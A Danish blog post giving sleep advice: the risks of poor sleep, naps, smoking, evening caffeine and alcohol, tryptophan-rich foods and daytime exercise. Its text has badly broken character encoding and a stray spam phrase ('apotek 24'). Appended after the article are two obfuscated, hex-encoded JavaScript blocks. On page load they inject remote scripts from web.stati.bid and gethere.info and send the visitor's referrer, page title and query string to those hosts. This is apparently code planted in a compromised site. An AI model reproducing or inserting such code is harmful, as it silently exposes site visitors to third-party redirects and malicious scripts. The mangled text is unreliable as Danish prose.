Holder du A?je med din sA?vn?

Gratis træningsprogrammer m.m.

Holder du A?je med din sA?vn?

5568834-sovejpg

 

Mange mennesker begA?r den store fejl, i den kA�mpe sundheds-dille, at huske pA? en vigtig del. SA?VN! SA?vn er lige sA? vigtigt for kroppen som kosten og trA�ningen. For at kunne restituere ordenligt har kroppen brug for en ordentlig sA?vn.

Hvis man har sA?vn problemer er risikoen for fedme diabetes og hjerte-kar sygdomme A?get.

For at kroppen kan fungere skal man minimum have 6 timers sA?vn om natten, for at hjernen kan fungere. Det er selvfA?lgelig forskelligt fra person til person, hvor meget man har brug for af sA?vn i lA?bet af en nat. I gennemsnit sover vi 7,5 time pr nat, nogle lidt mere, andre lidt mindre.

Hvis man en nat ikke fA?r nok sA?vn, sA? tag dig hellere en a�?Morfara�?, da en middagslur pA? fx 1 time vil tA�lle for det samme, som hvis man sov alle timerne ud i et. Snyd endelig ikke dig selv for at have det bedre, hvis det eneste det krA�ver er lidt sA?vn midt pA? dagen.

LA�s mere her:A�Videnskab.dk

 

Hvad kan du gA?re for at fA? en bedre sA?vn?

Ryger du? SA?vnforskere har lavet undersA?gelser pA? hvordan rygning pA?virker sA?vnen og alle resultater peger pA? at rygning har negativ pA?virkning pA? sA?vnen.

Rygning kan give:

  • Kortere sA?vnlA�ngde
  • Flere sA?vnforstyrrelser
  • ForvA�rret sA?vnstruktur
  • Natlig hoste
  • SA?vnapnA?
  • Astma
  • Rygetrang om natten

Det eneste jeg kan anbefale, STOP MED AT RYGE. Det er ikke godt for din krop, du bruger mange utrolig mange penge pA? den last og sA? lugter det jo ikke altid lige behageligt.

TA�nk over hvad du indtager i de sidste aftentimer inden sengetid. Drop aftenkaffen, alkoholen apotek 24 og mad med hA?jt fedtindhold eller energirig mad inden sengetid. Da det kan forkorte sA?vnlA�ngen og gA?re rem-sA?vnen lA�ngere og man fA?r mindre af den dybe nattesA?vn.

I stedet sA? spis fA?devarer, som indeholder aminosyren tryptofan, aminosyren bliver omdannet i kroppen til et sA?vnhormon kaldet melatonin som forlA�nger sA?vnen.

Det kan fx vA�re:

  • Mandler
  • Bananer
  • Chokolade
  • TA?rrede dadler
  • Yoghurt
  • KomA�lk

Husk motionen! Forskning tyder pA? at folk med sA?vnproblemer kan fA? en bedre sA?vn, hvis de er fysisk aktive i lA?bet af dagen, man skal gerne vA�re aktiv i ca 1 time. Fysisk aktivitet nedsA�tter stress og spA�ndinger, det er en god mA?de at koble af pA? og fA? tanker pA? afstand. Hold dog igen med at dyrke fysisk aktivitet lige inden sengetid da det kan vA�re forstyrrende for nattesA?vnen.

LA�s mere her:A�Videnskab.dk

var _0x29b4=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}